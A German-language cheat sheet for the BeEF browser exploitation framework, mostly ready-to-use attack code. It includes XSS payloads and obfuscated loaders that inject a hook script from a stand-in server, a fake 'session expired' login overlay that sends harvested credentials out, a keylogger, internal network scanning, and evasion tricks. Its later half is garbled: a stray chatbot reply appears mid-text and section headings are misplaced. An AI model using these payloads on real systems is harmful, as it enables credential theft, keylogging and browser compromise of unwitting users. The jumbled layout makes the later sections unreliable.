BeEF Browser Exploitation Framework Cheat Sheet

📋 Copy All Commands 📄 Generate PDF

Überblick

BeEF (Browser Exploitation Framework) ist ein Penetrationstesting-Tool, das sich auf den Webbrowser konzentriert. Es ermöglicht dem professionellen Penetrationstester, die tatsächliche Sicherheitslage einer Zielumgebung durch Client-seitige Angriffsvektoren zu bewerten.

⚠️ Warnung: Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Sicherheitsbewertungen vorgesehen. Stellen Sie sicher, dass Sie eine entsprechende Autorisierung haben, bevor Sie es in einer Umgebung einsetzen.

Installation

Kali Linux

# Install from repositories
sudo apt update
sudo apt install beef-xss

# Start BeEF
sudo beef-xss

sudo apt-get update
sudo apt-get install beef-xss

Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install git ruby ruby-dev bundler sqlite3 libsqlite3-dev

# Clone repository
git clone https://github.com/beefproject/beef.git
cd beef

# Install Ruby gems
bundle install

# Start BeEF
./beef

sudo apt-get update
sudo apt-get install beef-xss

Docker-Installation

# Pull official Docker image
docker pull beefproject/beef

# Run BeEF in Docker
docker run -p 3000:3000 -p 6789:6789 -p 61985:61985 -p 61986:61986 beefproject/beef

# Run with persistent data
docker run -v /opt/beef:/beef/data -p 3000:3000 -p 6789:6789 beefproject/beef

docker pull beefproject/beef
docker run -p 3000:3000 beefproject/beef

Manuelle Installation

# Install Ruby and dependencies
curl -sSL https://get.rvm.io|bash
source ~/.rvm/scripts/rvm
rvm install 3.0.0
rvm use 3.0.0 --default

# Clone and setup BeEF
git clone https://github.com/beefproject/beef.git
cd beef
bundle install
./beef

git clone https://github.com/beefproject/beef
cd beef
./install
./beef

Grundlegende Nutzung

BeEF starten

# Start BeEF server
./beef

# Start with custom configuration
./beef -c config.yaml

# Start with specific interface
./beef -x

# Start in debug mode
./beef -v

./beef

Web-Schnittstellen-Zugriff

# Default credentials
# Username: beef
# Password: beef

# Access web interface
# http://localhost:3000/ui/panel

# Hook URL for browsers
# http://localhost:3000/hook.js

- Öffnen Sie http://localhost:3000/ui/panel - Standard-Anmeldedaten: beef / beef

Konfiguration

Hauptkonfiguration (config.yaml)

beef:
    version: '0.5.4.0'
    debug: false
    crypto_default_value_length: 80

    # Web server configuration
    http:
        debug: false
        host: "0.0.0.0"
        port: "3000"

    # HTTPS configuration
    https:
        enable: false
        host: "0.0.0.0"
        port: "3443"
        cert: "beef.crt"
        key: "beef.key"

    # Database configuration
    database:
        driver: "sqlite"
        db_file: "beef.db"

    # Authentication
    credentials:
        user: "beef"
        passwd: "beef"

- Bearbeiten Sie config.yaml - Passen Sie Host, Port und Anmeldeinformationen an

Erweiterungskonfiguration

beef:
    extension:
        admin_ui:
            enable: true

        social_engineering:
            enable: true

        metasploit:
            enable: false
            host: "127.0.0.1"
            port: 55552

        dns:
            enable: false
            port: 53

        proxy:
            enable: false
            port: 8080

- Aktivieren/Deaktivieren von Erweiterungen in extensions.d/

Hook-Bereitstellung

Einfache Hook-Injektion

<script src="http://beef-server:3000/hook.js"></script>

<script>
var script = document.createElement('script');
script.src = 'http://beef-server:3000/hook.js';
document.head.appendChild(script);
</script>

<script>
eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,101,101,102,45,115,101,114,118,101,114,58,51,48,48,48,47,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59));
</script>

- Fügen Sie <script src="http://beef-server/hook.js"></script> in HTML ein

Erweiterte Hook-Techniken

// Dynamic hook loading
function loadBeef() \\\\{
    if (typeof beef === 'undefined') \\\\{
        var script = document.createElement('script');
        script.src = 'http://beef-server:3000/hook.js';
        script.onload = function() \\\\{
            console.log('BeEF hook loaded');
        \\\\};
        document.head.appendChild(script);
    \\\\}
\\\\}

// Conditional hook loading
if (document.domain === 'target-site.com') \\\\{
    loadBeef();
\\\\}

// Time-delayed hook
setTimeout(function() \\\\{
    loadBeef();
\\\\}, 5000);

- Dynamische Hook-Generierung - Bedingte Hook-Injektion

Hook über XSS

// Reflected XSS hook
http://vulnerable-site.com/search?q=<script src="http://beef-server:3000/hook.js"></script>

// Stored XSS hook
<img src="x" onerror="var s=document.createElement('script');s.src='http://beef-server:3000/hook.js';document.head.appendChild(s);">

// DOM-based XSS hook
javascript:var s=document.createElement('script');s.src='http://beef-server:3000/hook.js';document.head.appendChild(s);

- Nutzen Sie XSS-Schwachstellen zur Hook-Platzierung

Befehlsmodule

Browser-Informationen

# Get browser details
Browser > Get Browser Details

# Get system information
Browser > Get System Info

# Get installed plugins
Browser > Get Installed Plugins

# Get browser history
Browser > Get Visited URLs

# Get cookies
Browser > Get All Cookies

- Browser-Typ - Installierte Plugins - Systemdetails

Social Engineering

# Fake notification bar
Social Engineering > Fake Notification Bar

# Pretty theft
Social Engineering > Pretty Theft

# Clippy
Social Engineering > Clippy

# Fake flash update
Social Engineering > Fake Flash Update

# Simple hijacker
Social Engineering > Simple Hijacker

- Phishing-Dialoge - Fake-Updates - Täuschungsmodule

Netzwerk-Erkennung

# Internal network fingerprinting
Network > Fingerprint Network

# Port scanner
Network > Port Scanner

# Cross-origin scanner
Network > Cross-Origin Scanner

# DNS enumeration
Network > DNS Enumeration

- Interne IP-Adressen - Netzwerktopologie - Offene Ports

Persistenz

# Man-in-the-browser
Persistence > Man-In-The-Browser

# Confirm close tab
Persistence > Confirm Close Tab

# Create invisible iframe
Persistence > Create Invisible Iframe

# Tunnel
Persistence > Tunnel

- Lokale Speichermethoden - Browserdauerhaftigkeit - Hintergrundprozesse

Fortgeschrittene Angriffe

Credential Harvesting

// Custom credential harvester
beef.execute(function() \\\\{
    // Create fake login form
    var overlay = document.createElement('div');
    overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;';

    var form = document.createElement('div');
    form.innerHTML = `
        <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:30px;border-radius:5px;">
            <h3>Session Expired - Please Re-authenticate</h3>
            <input type="text" id="username" placeholder="Username" style="width:100%;padding:10px;margin:10px 0;">
            <input type="password" id="password" placeholder="Password" style="width:100%;padding:10px;margin:10px 0;">
            <button onclick="submitCreds()" style="width:100%;padding:10px;background:#007cba;color:white;border:none;">Login</button>
        </div>
    `;

    overlay.appendChild(form);
    document.body.appendChild(overlay);

    window.submitCreds = function() \\\\{
        var username = document.getElementById('username').value;
        var password = document.getElementById('password').value;

        // Send credentials to BeEF
        beef.net.send('/api/credentials', 0, 'POST',
            'username=' + encodeURIComponent(username) +
            '&password=' + encodeURIComponent(password)
        );

        overlay.remove();
    \\\\};
\\\\});

- Formular-Abfangen - Passwort-Diebstahl - Automatische Anmeldedaten-Extraktion

Keylogger

// Simple keylogger
beef.execute(function() \\\\{
    var keys = '';
    var lastSent = Date.now();

    document.addEventListener('keypress', function(e) \\\\{
        keys += String.fromCharCode(e.which);

        // Send keys every 10 seconds or 100 characters
        if (Date.now() - lastSent > 10000||keys.length > 100) \\\\{
            beef.net.send('/api/keylog', 0, 'POST', 'keys=' + encodeURIComponent(keys));
            keys = '';
            lastSent = Date.now();
        \\\\}
    \\\\});
\\\\});

- Tastatureingaben aufzeichnen - Versteckte Aufzeichnungsmethoden - Datenexfiltration

Browser Autopwn

// Browser exploitation chain
beef.execute(function() \\\\{
    // Check for vulnerabilities
    var exploits = [
        \\\\{name: 'CVE-2021-1234', check: function() \\\\{ return navigator.userAgent.includes('Chrome/89'); \\\\}\\\\},
        \\\\{name: 'CVE-2020-5678', check: function() \\\\{ return navigator.userAgent.includes('Firefox/85'); \\\\}\\\\}
    ];

    exploits.forEach(function(exploit) \\\\{
        if (exploit.check()) \\\\{
            beef.net.send('/api/exploit', 0, 'POST', 'exploit=' + exploit.name);
        \\\\}
    \\\\});
\\\\});

- Automatisierte Ausnutzung von Browser-Schwachstellen - Exploit-Ketten - Mehrstufige Angriffe

Netzwerk-Pivoting

Would you like me to elaborate on any specific section or provide more details?```javascript // Internal network scanning beef.execute(function() \\{ var targets = []; var baseIP = '192.168.1.';

for (var i = 1; i <= 254; i++) \\\\{
    var ip = baseIP + i;
    var img = new Image();
    img.onload = function() \\\\{
        targets.push(this.src.split('/')[2]);
    \\\\};
    img.src = 'http://' + ip + '/favicon.ico?' + Math.random();
\\\\}

setTimeout(function() \\\\{
    beef.net.send('/api/network', 0, 'POST', 'targets=' + JSON.stringify(targets));
\\\\}, 5000);

\\}); ## Integration mit anderen Toolsbash

Enable Metasploit extension in config.yaml

metasploit: enable: true host: "127.0.0.1" port: 55552

Start Metasploit RPC server

msfrpcd -P password -S -a 127.0.0.1 -p 55552

Use browser autopwn

use auxiliary/server/browser_autopwn2 set LHOST 192.168.1.100 set SRVHOST 192.168.1.100 run ### Social Engineering Toolkit (SET)bash

Use SET with BeEF

setoolkit

Select Social-Engineering Attacks

Select Website Attack Vectors

Select Credential Harvester Attack Method

Select Site Cloner

Enter target URL and BeEF hook

### Benutzerdefinierte REST APIpython

Python script for BeEF API interaction

import requests import json

class BeefAPI: def init(self, host='localhost', port=3000): self.base_url = f"http://\\{host\\}:\\{port\\}/api" self.token = None

def authenticate(self, username='beef', password='beef'):
    auth_data = \\\\{
        'username': username,
        'password': password
    \\\\}
    response = requests.post(f"\\\\{self.base_url\\\\}/admin/login", json=auth_data)
    if response.status_code == 200:
        self.token = response.json()['token']
        return True
    return False

def get_hooked_browsers(self):
    headers = \\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\}
    response = requests.get(f"\\\\{self.base_url\\\\}/hooks", headers=headers)
    return response.json()

def execute_module(self, hook_id, module_id, options=\\\\{\\\\}):
    headers = \\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\}
    data = \\\\{
        'module_id': module_id,
        'options': options
    \\\\}
    response = requests.post(f"\\\\{self.base_url\\\\}/modules/\\\\{hook_id\\\\}",
                           json=data, headers=headers)
    return response.json()

Usage example

beef = BeefAPI() beef.authenticate() browsers = beef.get_hooked_browsers() print(f"Hooked browsers: \\{len(browsers)\\}") ## Umgehungstechnikenjavascript // Base64 encoded hook var encoded = 'dmFyIHM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7cy5zcmM9J2h0dHA6Ly9iZWVmLXNlcnZlcjozMDAwL2hvb2suanMnO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQocyk7'; eval(atob(encoded));

// Hex encoded hook var hex = '766172207336646f63756d656e742e637265617465456c656d656e74282773637269707427293b732e7372633d27687474703a2f2f626565662d7365727665723a333030302f686f6f6b2e6a73273b646f63756d656e742e686561642e617070656e644368696c642873293b'; eval(hex.match(/.\\{2\\}/g).map(function(h) \\{ return String.fromCharCode(parseInt(h, 16)); \\}).join(''));

// Dynamic construction var parts = ['ht', 'tp:', '//', 'beef-', 'server:', '3000', '/hook.', 'js']; var url = parts.join(''); var s = document.createElement('script'); s.src = url; document.head.appendChild(s); ### Hook-Verschleierungjavascript // Use CDN for domain fronting var script = document.createElement('script'); script.src = 'https://cdn.example.com/beef/hook.js'; script.setAttribute('data-host', 'beef-server.com'); document.head.appendChild(script); ### Domain Frontingjavascript // Hide hook in image metadata function extractHookFromImage(imageUrl) \\{ var canvas = document.createElement('canvas'); var ctx = canvas.getContext('2d'); var img = new Image();

img.onload = function() \\\\{
    canvas.width = img.width;
    canvas.height = img.height;
    ctx.drawImage(img, 0, 0);

    var imageData = ctx.getImageData(0, 0, 1, 1);
    var data = imageData.data;

    // Extract hidden data from LSB
    var hookUrl = extractLSB(data);
    loadHook(hookUrl);
\\\\};

img.src = imageUrl;

\\} ### Steganographiepython

Analyze BeEF sessions

import sqlite3 import json

def analyze_beef_sessions(db_path): conn = sqlite3.connect(db_path) cursor = conn.cursor()

# Get hooked browsers
cursor.execute("SELECT * FROM hooked_browsers")
browsers = cursor.fetchall()

# Get command results
cursor.execute("SELECT * FROM command_modules")
commands = cursor.fetchall()

# Generate report
report = \\\\{
    'total_browsers': len(browsers),
    'total_commands': len(commands),
    'browsers': browsers,
    'commands': commands
\\\\}

return report

Usage

report = analyze_beef_sessions('/path/to/beef.db') print(json.dumps(report, indent=2)) ### Sitzungsanalysepython

Create attack timeline

import matplotlib.pyplot as plt import datetime

def create_timeline(sessions): timestamps = [] events = []

for session in sessions:
    timestamp = datetime.datetime.fromisoformat(session['created_at'])
    timestamps.append(timestamp)
    events.append(f"Browser hooked: \\\\{session['browser_name']\\\\}")

plt.figure(figsize=(12, 6))
plt.plot(timestamps, range(len(timestamps)), 'o-')
plt.title('BeEF Attack Timeline')
plt.xlabel('Time')
plt.ylabel('Events')
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig('beef_timeline.png')

### Zeitachsenanalysebash

Port already in use

sudo netstat -tulpn|grep :3000 sudo kill -9 $(lsof -t -i:3000)

Ruby version issues

rvm list rvm use 3.0.0 bundle install

Database issues

rm beef.db ./beef

Permission issues

sudo chown -R \(USER:\)USER /path/to/beef chmod +x beef ## Fehlerbehebungbash

Start BeEF in debug mode

./beef -v

Check logs

tail -f beef.log

Browser console debugging

Open browser developer tools

Check for JavaScript errors

Monitor network requests

### Häufige Problemebash

Check firewall rules

sudo ufw status sudo iptables -L

Test connectivity

curl http://localhost:3000/hook.js

Check DNS resolution

nslookup beef-server.com ```### Debug-Modus https://beefproject.com/##

Netzwerkprobleme

https://github.com/beefproject/beef#

Sicherheitsüberlegungen

https://github.com/beefproject/beef/wiki##

Operationelle Sicherheit

• HTTPS für Produktivumgebungen verwenden
• Standard-Zugangsdaten ändern
• Angemessene Zugriffskontrollen implementieren
• Auf Erkennung überwachen
• Legitime Domains und Zertifikate verwenden https://owasp.org/www-project-web-security-testing-guide/##

Rechtliche und ethische Aspekte

• Ordnungsgemäße Autorisierung einholen
• Verantwortungsvolle Offenlegung befolgen
• Privatsphäre und Datenschutz respektieren
• Alle Aktivitäten dokumentieren
• Sicherheitssensibilisierungstraining durchführen https://www.sans.org/white-papers/33864/#

Ressourcen